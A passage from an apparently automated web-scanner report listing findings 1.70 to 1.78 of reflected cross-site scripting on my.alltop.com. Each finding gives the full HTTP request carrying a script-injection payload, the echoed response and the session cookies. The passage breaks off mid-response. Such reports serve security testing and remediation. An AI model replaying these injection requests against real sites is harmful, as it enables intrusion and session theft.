<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ce5dd9"><script>alert(1)</script>f2db9325532/%2522ns%253D%2522netsparker%25280x000184%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.70. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f0a"><script>alert(1)</script>ed05747b51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)b4f0a"><script>alert(1)</script>ed05747b51 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:33 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:33 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:33 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)b4f0a"><script>alert(1)</script>ed05747b51" method="post" accept-charset="utf-8">
...[SNIP]...

1.71. http://my.alltop.com/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80c18"><script>alert(1)</script>1dd78b143d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)?80c18"><script>alert(1)</script>1dd78b143d9=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:28 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:30 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:30 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/c/%2522ns%253D%2522netsparker%25280x000184%2529)?80c18"><script>alert(1)</script>1dd78b143d9=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.72. http://my.alltop.com/alpha/d ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d

Issue detail

The value of the '"--></style></script><script>netsparker(0x00017C)</script> request parameter is copied into the HTML document as plain text between tags. The payload 14abe<script>alert(1)</script>f1b3e1969f4 was submitted in the '"--></style></script><script>netsparker(0x00017C)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d?'"--></style></script><script>netsparker(0x00017C)</script>14abe<script>alert(1)</script>f1b3e1969f4 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>14abe<script>alert(1)</script>f1b3e1969f4" method="post" accept-charset="utf-8">
...[SNIP]...

1.73. http://my.alltop.com/alpha/d [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50af3"><script>alert(1)</script>6a46101e2ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d50af3"><script>alert(1)</script>6a46101e2ad HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:42 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:43 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:43 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d50af3"><script>alert(1)</script>6a46101e2ad" method="post" accept-charset="utf-8">
...[SNIP]...

1.74. http://my.alltop.com/alpha/d [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd46b"><script>alert(1)</script>de24a9099e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d?bd46b"><script>alert(1)</script>de24a9099e8=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:41 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:42 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:42 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d?bd46b"><script>alert(1)</script>de24a9099e8=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.75. http://my.alltop.com/alpha/d [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69c21"><script>alert(1)</script>ad3b91a408c was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E69c21"><script>alert(1)</script>ad3b91a408c HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E69c21"><script>alert(1)</script>ad3b91a408c" method="post" accept-charset="utf-8">
...[SNIP]...

1.76. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da4e7"><script>alert(1)</script>d96af54cd76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d'%22--%3E%3Cda4e7"><script>alert(1)</script>d96af54cd76/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:09 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:10 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:10 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d'%22--%3E%3Cda4e7"><script>alert(1)</script>d96af54cd76/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.77. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c52d"><script>alert(1)</script>542e0022250 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d'%22--%3E%3C/style%3E%3C9c52d"><script>alert(1)</script>542e0022250/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:14 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/d'%22--%3E%3C/style%3E%3C9c52d"><script>alert(1)</script>542e0022250/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.78. http://my.alltop.com/alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df22f"><script>alert(1)</script>9bc35107a2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/d'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000173)%3Cdf22f"><script>alert(1)</script>9bc35107a2a/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
